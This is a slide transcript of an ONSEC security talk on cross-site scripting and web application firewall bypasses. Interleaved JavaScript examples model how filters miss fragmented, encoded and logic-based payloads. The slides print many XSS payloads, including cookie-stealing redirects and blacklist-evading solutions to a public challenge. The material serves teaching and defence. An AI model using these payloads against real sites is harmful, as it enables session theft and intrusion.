[ONSEC] XSS vs WAF
d0znp (ONSEC), slide transcript
1.
XSS vs WAF: Best practice
2.
XSS: Cross Site Scripting
• Cross-site execution of scripts.
• Can be used by an attacker to obtain data (cookie, DOM, etc.) and to mount further attacks (CSRF, spam).
• Classic example: <input type=text value=""><script>alert(document.cookie)</script>">
* you can sleep
3.
XSS: the standard classification
• Reflected (non-persistent): the server's response contains data taken from the request.
• Stored (persistent): the server's response contains data injected earlier.
• DOM based: the page is modified dynamically on the client side by data from the request.
* you can sleep
4.
XSS: technical classification
• Tag injection: <input type=text value=><script>alert(1337)</script>
• Attribute injection: <a href='http://cmc.msu.su' onclick=alert(1337) a=''>
• Injection into active content (JavaScript, SWF, PDF): if (text=='a' || alert(1337) || '') {
• Injection into an HTTP response header and elsewhere: Location: javascript:alert(1) (miXSS)
* you can sleep
5.
miXSS: meta information XSS
• Tyler Reguly, nCircle, 06.04.2010
* you can wake up
6.
XSS: classification by delivery
• Requiring user interaction: <a href='a' onmouseover=alert(1337) style='font-size:500px'>
• Autonomous (fires without interaction): <input type=text value=a onfocus=alert(1337) AUTOFOCUS>
* you can sleep
7.
XSS: latest examples
• Twitter, 21.09.2010: http://twitter.com/nn#@"onmouseover="alert(1337);"/
• YouTube, 04.07.2010
* you may start waking up
8.
From XSS to CAS: everything new is...
• Cross Application Scripting
• Many GUIs understand HTML
• http://www.backtrack-linux.org/backtrack/cross-application-scripting-all-you-kde-are-belong-to-us/
* you can wake up
9.
iPhone/iPad CAS prototypes
• SMS manager: tel:/+7123213?call
• Safari: <iframe src="skype:/+27836712?call">
• Mail manager: example withheld until the vulnerability is fixed
* remember this
10.
WAF: Web Application Firewall
• Blocks a suspicious request
• Rewrites a suspicious request
• Blocks the source of a suspicious request
• Suspicious by signature: the request matches a regular expression such as 'onmouse*'
• Suspicious by rules: a request with no history (e.g. straight to the password-change page without ever visiting the main page)
* time to wake up
11.
WAF: implementation difficulties
• Simple signatures often misfire: " ' < > [ { } ] ( )
• Complex signatures are always incomplete because of the variety of browsers and the like: onmouseover -> onmouseenter
• Data has to be normalized before signature analysis: e\xp\re\s\s\i\o\n(alert(1337))
* get up!
12.
WAF: implementation difficulties
• Some web application functionality requires the WAF to be switched off (an HTML editor)
• The web application may be vulnerable to fragmented attacks: http://localhost/t.php?a=<scri&a=pt>&a=alert(1)&a=</scri&a=pt>
• A JavaScript interpreter has to be embedded: document[(![]+/./)[5]+(![]+/./)[1]+(![]+/./)[1]+String.fromCharCode(75,73)+(![]+/./)[4]]
* get up!
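The fragmented request on this slide, worked through as an added example that is not part of the ONSEC slides: a WAF that matches each occurrence of a query parameter on its own never sees a complete script tag, while a back end that reassembles repeated parameters does. The back-end behaviours modelled here are assumptions for the example (PHP keeps the last value, ASP.NET joins with a comma, "join" stands for any component that concatenates the fragments); the probe on the slide is how you find out which one you are facing.

```javascript
// Added example (not from the ONSEC slides): HTTP parameter pollution against
// a WAF that inspects each parameter value separately. Back-end behaviours are
// constructed models: "last" is PHP-style $_GET, "comma" is ASP.NET-style
// Request.QueryString, "join" is any component that concatenates fragments.

// Query-string parser that keeps every occurrence of a name, in order.
function parseQuery(qs) {
  const params = new Map();
  for (const pair of qs.replace(/^\?/, "").split("&")) {
    if (pair === "") continue;
    const i = pair.indexOf("=");
    const name = decodeURIComponent(i < 0 ? pair : pair.slice(0, i));
    const value = decodeURIComponent(i < 0 ? "" : pair.slice(i + 1));
    if (!params.has(name)) params.set(name, []);
    params.get(name).push(value);
  }
  return params;
}

// Signature in the style of a simple blacklist rule for script tags.
const SCRIPT_TAG = /<\s*\/?\s*script\b/i;

// WAF model: every parameter value is matched on its own.
function wafBlocksPerValue(qs) {
  for (const values of parseQuery(qs).values()) {
    if (values.some((v) => SCRIPT_TAG.test(v))) return true;
  }
  return false;
}

// Back-end models for how repeated parameters become a single value.
const BACKENDS = {
  last: (values) => values[values.length - 1], // PHP-style $_GET
  comma: (values) => values.join(","),          // ASP.NET-style Request.QueryString
  join: (values) => values.join(""),            // constructed: plain concatenation
};

// The value the application actually inserts into its HTML for `name`.
function reassembled(qs, name, backend) {
  return BACKENDS[backend](parseQuery(qs).get(name) || []);
}

// The fragmented request from slide 12 (query string only, constructed input).
const FRAGMENTED = "a=<scri&a=pt>&a=alert(1)&a=</scri&a=pt>";

// WAF verdict on the request plus, per back-end model, the reassembled value
// and whether the same signature would have matched it.
function report(qs = FRAGMENTED, name = "a") {
  const out = { wafBlocks: wafBlocksPerValue(qs) };
  for (const backend of Object.keys(BACKENDS)) {
    const value = reassembled(qs, name, backend);
    out[backend] = { value, dangerous: SCRIPT_TAG.test(value) };
  }
  return out;
}
```

`report()` shows the WAF passing the request while the "join" model produces `<script>alert(1)</script>`; the defence is to normalize repeated parameters the same way the protected application does before any signature is applied.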
13.
HOWTO find WAF 0day ;)
• Look for data that is not filtered (_FILES, URI, ...)
• Look for normalization errors (uni/*union*/on, \u000000028)
• Look for signatures that are not filtered
• Look for logic errors (XSS through a whitelist)
• Everything else
* get up!
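Slides 11 and 13 make one point from two sides: signatures have to run on normalized data, and the normalization itself is an attack surface when the WAF decodes differently from the browser or database behind it. The following added example (not from the ONSEC slides) runs a signature against the raw probe, against a reasonable normalization and against a sloppy one. Both normalizers are constructed for this example; how any real WAF or back end decodes these strings is an assumption, and finding exactly that disagreement is the method the slide describes.

```javascript
// Added example (not from the ONSEC slides): one signature, three views of
// the same input. Normalizers are constructed models, not any product's code.

const SIG_EXPRESSION = /expression\s*\(/i; // IE CSS expression()
const SIG_UNION = /\bunion\b/i;            // SQL UNION keyword
const SIG_PAREN = /\(/;                    // "(" from a character blacklist

// CSS backslash escapes: "\" plus 1-6 hex digits (and an optional trailing
// space) is a code point; "\" plus any other character is that character.
// e\xp\re\s\s\i\o\n therefore reads as "expression" to a CSS parser.
function decodeCssEscapes(s) {
  return s.replace(/\\([0-9a-fA-F]{1,6}) ?|\\([\s\S])/g, (m, hex, ch) =>
    hex !== undefined ? String.fromCodePoint(parseInt(hex, 16)) : ch
  );
}

// Strict JavaScript-style \uXXXX: exactly four hex digits are consumed, so
// \u000000028 becomes NUL followed by the text "00028".
function decodeUnicodeStrict(s) {
  return s.replace(/\\u([0-9a-fA-F]{4})/g, (m, hex) =>
    String.fromCharCode(parseInt(hex, 16))
  );
}

// Lenient variant (assumed for the example) that tolerates leading zeros,
// so \u000000028 becomes "(". If WAF and back end pick different rules,
// the signature is checked against the wrong string.
function decodeUnicodeLenient(s) {
  return s.replace(/\\u0*([0-9a-fA-F]{4})/g, (m, hex) =>
    String.fromCharCode(parseInt(hex, 16))
  );
}

// Proper SQL block-comment handling: drop the whole /* ... */, as the
// database does, so uni/*union*/on becomes "union".
function stripSqlComments(s) {
  return s.replace(/\/\*[\s\S]*?\*\//g, "");
}

// Sloppy handling: remove only the delimiters and keep the body, giving
// "uniunionon", in which \bunion\b no longer matches.
function stripSqlCommentDelimiters(s) {
  return s.replace(/\/\*|\*\//g, "");
}

// Verdicts of one signature on the raw input, a properly normalized copy
// and a sloppily normalized copy.
function verdicts(input, sig) {
  const normalized = decodeCssEscapes(stripSqlComments(decodeUnicodeLenient(input)));
  const sloppy = stripSqlCommentDelimiters(decodeUnicodeStrict(input));
  return {
    raw: sig.test(input),
    normalized: sig.test(normalized),
    sloppy: sig.test(sloppy),
  };
}

// The probes from slides 11 and 13 as constructed string literals; the
// doubled backslashes are JavaScript escaping for a single "\".
const PROBES = {
  css: "e\\xp\\re\\s\\s\\i\\o\\n(alert(1337))",
  sql: "uni/*union*/on", // raw matching only hits because the word sits inside the comment
  uni: "\\u000000028",
};
```

`verdicts(PROBES.css, SIG_EXPRESSION)` is `{raw: false, normalized: true, sloppy: false}`: without CSS-escape decoding the expression() rule never fires. For `PROBES.sql` the sloppy normalizer turns a detectable `union` into `uniunionon`, and for `PROBES.uni` only the lenient decoder reveals the parenthesis; whichever of the two the back end agrees with decides whether the other one is a bypass.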
14.
HOWTO find WAF 0day ;)
• Try testing the WAF for filtering of the JavaScript function setInterval()
• setInterval is the repeating counterpart of setTimeout and, like it, accepts a string of code as its first argument
• For some reason it gets forgotten when signatures are written, which stop at setTimeout
• There are very many cases like this; at the very least look through the list of events at http://msdn.microsoft.com/en-us/library/ms533051(VS.85).aspx
* get up!
15.
Let's run an experiment
• Opened XSS challenge at http://onsec.ru/t.php
• The WAF filters ' " < > ( ) // in $_GET, $_POST, $_COOKIE, $_FILES
• Injection points in the code:
  "<input type='text' name='text' value='".$_GET['text']."'>"
  "<input type='text' name='search' value=".$_POST['search'].">"
  "<h3 onmouseover=".$_GET['aaa'].">"
* get up!
16.
Let's run an experiment
• Opened XSS challenge at http://onsec.ru/t.php
• Solutions from oRB [rdot.org]:
  /t.php?aaa=document.location.href=[document.referrer,document.cookie]
  /t.php?aaa=document.location=[/javascript:1/.source,location.pathname,location.hash]#/;alert(document.cookie);
• Solution from asddas [rdot.org]:
  /t.php?aaa=document.location.href=document.forms[0].text.value&text=http:google.com
* get up!
17.
Let's run an experiment
• Opened XSS challenge at http://onsec.ru/t.php
• Solution from Vlad Roskov [vos.uz]:
  /t.php?aaa=document.all[5][window.name]=location.hash#<input style=width:100%;height:100%; onmouseover="alert(document.cookie)">
• The most elegant solution, from Ruben Ventura [thr3w]:
  /t.php?aaa=location.href=%26quot;javascript:alert\u0028/XSS/.source\u0029%26quot;
* get up!
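The challenge on slides 15 to 17 is a worked case of the "logic error" item from slide 13: the blacklist is enforced exactly as described, yet every submitted solution passes it, because the `onmouseover=` sink is an unquoted attribute whose value is already JavaScript and needs none of the blocked characters. The following added example (not the challenge's own code) models the blacklist and the three sinks from slide 15 and checks the solutions from slides 16 and 17 against them; the attribute parser and entity decoding are constructed here to show what the browser ends up executing.

```javascript
// Added example (not the challenge's code): the onsec.ru/t.php WAF as slide 15
// describes it, the three sinks, and the solutions from slides 16 and 17.

// Characters the challenge WAF rejected in $_GET, $_POST, $_COOKIE, $_FILES.
const BLOCKED = ["'", '"', "<", ">", "(", ")", "//"];

function wafAllows(value) {
  return !BLOCKED.some((tok) => value.includes(tok));
}

// The three injection points from slide 15; PHP concatenation modelled in JS.
const SINKS = {
  text: (v) => `<input type='text' name='text' value='${v}'>`,   // quoted: breaking out needs a blocked '
  search: (v) => `<input type='text' name='search' value=${v}>`, // unquoted: a space starts a new attribute
  aaa: (v) => `<h3 onmouseover=${v}>`,                            // unquoted event handler: the value is JavaScript
};

// An unquoted attribute value runs up to the next whitespace or ">".
function unquotedAttr(html, name) {
  const m = new RegExp(name + "=([^\\s>]*)").exec(html);
  return m ? m[1] : null;
}

// Minimal character-reference decoding, only what this example needs: the
// HTML parser turns &quot; inside an attribute value into a double quote.
function decodeQuot(s) {
  return s.replace(/&quot;/g, '"');
}

// The source text the browser registers as the onmouseover handler.
function handlerSource(aaa) {
  return decodeQuot(unquotedAttr(SINKS.aaa(aaa), "onmouseover"));
}

// The submitted values of aaa as the server sees them after URL decoding
// (%26quot; has already become &quot;). URL fragments (#...) never reach the
// server or the WAF, only the browser.
const SOLUTIONS = {
  // oRB: an array literal stringifies with commas, so a URL can be assembled
  // from attacker-influenced pieces without parentheses or quotes.
  oRB_referrer: "document.location.href=[document.referrer,document.cookie]",
  oRB_hash: "document.location=[/javascript:1/.source,location.pathname,location.hash]",
  // asddas: the destination comes from another field the WAF let through.
  asddas: "document.location.href=document.forms[0].text.value",
  // vos: property name and payload come from browser state (window.name,
  // location.hash) that the WAF never inspects.
  vos: "document.all[5][window.name]=location.hash",
  // thr3w: the HTML parser restores the quotes and the JavaScript parser
  // restores the parentheses, both after the WAF has looked.
  thr3w: "location.href=&quot;javascript:alert\\u0028/XSS/.source\\u0029&quot;",
};

// For each solution: does it pass the blacklist, and what handler results.
function evaluate() {
  const result = {};
  for (const [who, aaa] of Object.entries(SOLUTIONS)) {
    result[who] = { allowed: wafAllows(aaa), handler: handlerSource(aaa) };
  }
  return result;
}

// The string literal in thr3w's handler as the JavaScript engine reads it;
// JSON string syntax covers the \uXXXX escapes used here.
function thr3wUrl() {
  const literal = handlerSource(SOLUTIONS.thr3w).slice("location.href=".length);
  return JSON.parse(literal);
}
```

`evaluate()` reports every solution as allowed, and `thr3wUrl()` returns `javascript:alert(/XSS/.source)`: the blocked parentheses and quotes are materialized by two decoders that run after the WAF. A blacklist on request characters cannot fix this sink; the fix is in the template (quote the attribute, encode the value for that context, and never place request data in an event handler).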
18.
WAF: is it really that bad?
• A WAF detects the attacker
• A WAF closes some attack vectors
• A WAF is good; make it even better!
* you can sleep again
19.
CONTACTS: D0znpp@ONSEC.RU
QUESTIONS ???